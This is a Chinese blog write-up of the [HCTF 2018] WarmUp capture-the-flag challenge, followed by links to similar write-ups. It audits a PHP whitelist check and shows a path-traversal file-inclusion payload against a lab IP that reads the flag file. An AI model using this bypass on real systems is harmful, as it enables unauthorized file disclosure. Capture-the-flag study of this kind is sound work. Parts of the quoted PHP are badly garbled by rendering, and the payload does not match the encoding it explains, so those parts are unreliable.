一、[HCTF 2018]WarmUp

最新推荐文章于 2024-04-22 16:59:45 发布
最新推荐文章于 2024-04-22 16:59:45 发布
阅读量126 收藏 1
点赞数
分类专栏: BUUOJ_Web_Writeup 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xiyuer_/article/details/121747203
版权

1.第一步看源码
在这里插入图片描述
在这里插入图片描述

2.看source.php
在这里插入图片描述
观察源码逻辑,首先可以发现白名单是只有source.php和hint.php,通过访问hint.php我们可以知道flag在ffffllllaaaagggg文件中
在这里插入图片描述

但很明显我们无法直接访问,所以当然是继续分析逻辑
3.审计source.php文件

if (! empty( R E Q U E S T [ ′ f i l e ′ ] ) / / _REQUEST['file']) // REQUEST[file])//_REQUEST[‘file’]值非空
&& is_string( R E Q U E S T [ ′ f i l e ′ ] ) / / _REQUEST['file']) // REQUEST[file])//_REQUEST[‘file’]值为字符串
&& emmm::checkFile($_REQUEST[‘file’]) //能够通过checkFile函数校验
) {
include R E Q U E S T [ ′ f i l e ′ ] ; / / 包 含 _REQUEST['file']; //包含 REQUEST[file];//_REQUEST[‘file’]文件
exit;
} else {
echo “
<img src=“https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg” />”;
//打印滑稽表情
}
这段代码告诉们需要满足三个条件
1.值为非空
2.值为字符串
3.能够通过checkFile()函数校验
否则打印滑稽
4.查看checkfile
highlight_file(FILE); //打印代码
class emmm //定义emmm类
{
public static function checkFile(& p a g e ) / / 将 传 入 的 参 数 赋 给 page)//将传入的参数赋给 page)//page
{
w h i t e l i s t = [ " s o u r c e " = > " s o u r c e . p h p " , " h i n t " = > " h i n t . p h p " ] ; / / 声 明 whitelist = ["source"=>"source.php","hint"=>"hint.php"];//声明 whitelist=["source"=>"source.php","hint"=>"hint.php"];//whitelist(白名单)数组
if (! isset( p a g e ) ∣ ∣ ! i s s t r i n g ( page) || !is_string( page)!isstring(page)) {//若$page变量不存在或非字符串
echo “you can’t see it”;//打印"you can’t see it"
return false;//返回false
}

    if (in_array($page, $whitelist)) {//若$page变量存在于$whitelist数组中
        return true;//返回true
    }

    $_page = mb_substr(//该代码表示截取$page中'?'前部分,若无则截取整个$page
        $page,
        0,
        mb_strpos($page . '?', '?')
    );
    if (in_array($_page, $whitelist)) {
        return true;
    }

    $_page = urldecode($page);//url解码$page
    $_page = mb_substr(
        $_page,
        0,
        mb_strpos($_page . '?', '?')
    );
    if (in_array($_page, $whitelist)) {
        return true;
    }
    echo "you can't see it";
    return false;
}

}

1.第一个if语句对变量进行检验,要求 p a g e 为 字 符 串 , 否 则 返 回 f a l s e 2. 第 二 个 i f 语 句 判 断 page为字符串,否则返回false 2.第二个if语句判断 pagefalse2.ifpage是否存在于 w h i t e l i s t 数 组 中 , 存 在 则 返 回 t r u e 3. 第 三 个 i f 语 句 判 断 截 取 后 的 whitelist数组中,存在则返回true 3.第三个if语句判断截取后的 whitelisttrue3.ifpage是否存在于 w h i t e l i s t 数 组 中 , 截 取 whitelist数组中,截取 whitelistpage中’?‘前部分,存在则返回true
4.第四个if语句判断url解码并截取后的 p a g e 是 否 存 在 于 page是否存在于 pagewhitelist中,存在则返回true
若以上四个if语句均未返回值,则返回false
有三个if语句可以返回true,第二个语句直接判断$page,不可用
第三个语句截取’?‘前部分,由于?被后部分被解析为get方式提交的参数,也不可利用
第四个if语句中,先进行url解码再截取,因此我们可以将?经过两次url编码,在服务器端提取参数时解码一次,
checkFile函数中解码一次,仍会解码为’?’,仍可通过第四个if语句校验。(’?‘两次编码值为’%253f’),构造url:
5.所以就能执行包含文件
payload:
http://175.24.184.228:10011/?file=source.php?../…/…/…/…/ffffllllaaaagggg
这边ffffllllaaaagggg文件前面的路径加…/是因为他和index.php不在同一个目录下,所以读取的是上级目录。
在这里插入图片描述

囍语儿
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[HCTF 2018]WarmUp
Panacea
05-31 324
之前比赛时候就有碰见这个,但不知为什么把这个题给忘记了,直到buu做题的时候发现了,这次把思路记下来,防止我又忘记hhhhhh 打开后查看源码,看到注释 在链接后面添加/source.php,打开网页,发现是代码审计 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist
HCTF 2018WarmUp
Lixunzhe0112的博客
01-17 1274
原理如下:在我们将参数传给file时,服务器端会自动进行一次url解码,然后这里还有个urldecode再进行一次解码。_REQUEST[‘file’])&& emmm::checkFile($_REQUEST[‘file’]三个条件同时为真,才会包含我们传入的file。/flag.php’)和include(‘…所以:/var/www/flag.php 和…/var/www/flag.php是一个文件,上层没有了。说明flag.php在 /var/html类似目录中,只有两层,var为最上层了。
Buuctf-Web-[HCTF 2018]Warm Up 题解&代码审计
最新发布
m0_62239233的博客
04-22 1356
Buuctf-Web-[HCTF 2018]Warm Up 题解&代码审计
[HCTF 2018] WarmUp
Knsec
05-13 2251
[HCTF 2018] WarmUp 开局一张图,先看看页面源码信息 给出了一个 source.php 应该是后端的源码,这题代码审计了 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"
[HCTF 2018]WarmUp全网最详细解释
Welcome To Myon'Blog !
11-08 2815
对'hint.php'执行mb_substr函数,但是函数内一个参数是来自另一个函数mb_strpos的返回值,因此我们先看mb_strpos函数,使用.进行字符连接,即连接了一个问号字符 '?',得到hint.php?因为我们当前的source.php一般是在html目录下,往上是www,var,然后到根目录,flag一般就放在根目录下面,这里还有一个hint.php?检查'hint.php'是否在白名单中(白名单包括hint.php和source.php),在,继续执行后面的代码;
TensorFlow Serving API设置warmup
01-07
运行后附代码文件生成tf_serving_warmup_requests文件; 置其于模型保存文件夹内的assets.extra文件夹下; 重启docker API即可,可观察到屏幕输出显示warmp启动成功; 保存模型的文件结构于是乎成为: . ├── ...
SharePoint Warm up WSP包
05-10
SharePoint Warm up WSP包是一种专门针对SharePoint环境优化启动速度的解决方案。在SharePoint环境中,初次访问或者长时间未访问的网站集可能会因为缓存、IIS应用程序池回收等因素导致加载速度较慢。这种现象通常被...
WarmUp
03-26
总结起来,"WarmUp"在CSS上下文中可能是关于性能优化和提升网页加载速度的一个主题,涵盖了多种技术方法和最佳实践。通过学习和应用这些技巧,开发者可以确保他们的网站在各种设备和网络条件下都能快速、有效地呈现...
neo_warmup:热身 Neo4j
06-05
Neo_Warm 非托管扩展这是一个预热数据库的非托管扩展。 构建它: mvn clean package将 target/warmup-1.0.jar 复制到 Neo4j 服务器的 plugins/ 目录中。 通过在 conf/neo4j-server.properties 中添加一行来配置 ...
Proyecto-Warmup
03-18
标题“Proyecto-Warmup”很可能是一个Java项目的名字,它可能是为了热身或者初始化某个复杂的开发任务而设计的。在Java编程中,"Warmup"通常指的是预热过程,这可能涉及到启动应用、加载必要的数据结构或进行性能...
[ctf]HCTF 2018 warmup超详详详详解
momoadsp的博客
05-11 3750
打开以后发现是一个jpg图片,查看源代码 发现被注释掉的source.php 访问 发现了,因为high_file而被泄漏的源代码 发现除了source.php,还有hint.php 我们访问hint.php 我们知道了flag在ffffllllaaaagggg中 接着我们来分析代码 <?php highlight_file(__FILE__); class emmm { public static function checkFile
[HCTF 2018]WarmUp详解
qq_52364123的博客
04-10 239
BUUCTF-[HCTF 2018]WarmUp-代码审计
[HCTF 2018]warmup
weixin_52268949的博客
01-18 307
2018 warmup 进入题目一张滑稽脸查看源代码发现source.php 之后我们访问source.php发现源代码 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.ph

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值